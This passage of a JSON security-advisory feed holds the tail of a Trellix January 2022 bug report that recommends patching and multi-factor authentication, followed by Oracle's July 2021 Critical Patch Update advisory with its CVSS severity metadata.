\n\n##### The Gold Standard\n\nSince this was a coordinated release from all the Linux distributions, it really should just be applied. It\u2019s worth pointing out that anomalous login points-of-origin should be recorded, flagged, and possibly blocked without some other form of authentication. You are using multi-factor authentication, right? MFA would stop non-insider-threats from exploiting this, as they wouldn\u2019t be able to access the system. As for insider threats, well, that\u2019s left as an exercise for the reader.\n", "cvss3": {}, "published": "2022-02-02T00:00:00", "type": "trellix", "title": "The Bug Report - January 2022 Edition", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-31166", "CVE-2021-3560", "CVE-2021-4034", "CVE-2021-42392", "CVE-2021-44228", "CVE-2022-0185", "CVE-2022-21907"], "modified": "2022-02-02T00:00:00", "id": "TRELLIX:39F5630F37B0A70500113404A73FE414", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/the-bug-report-january-2022.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "oracle": [{"lastseen": "2023-09-30T02:41:45", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. 
In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 342 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ July 2021 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2788740.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-20T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - July 2021", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "modified": "2021-09-03T00:00:00", "id": "ORACLE:CPUJUL2021", "href": "https://www.oracle.com/security-alerts/cpujul2021.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}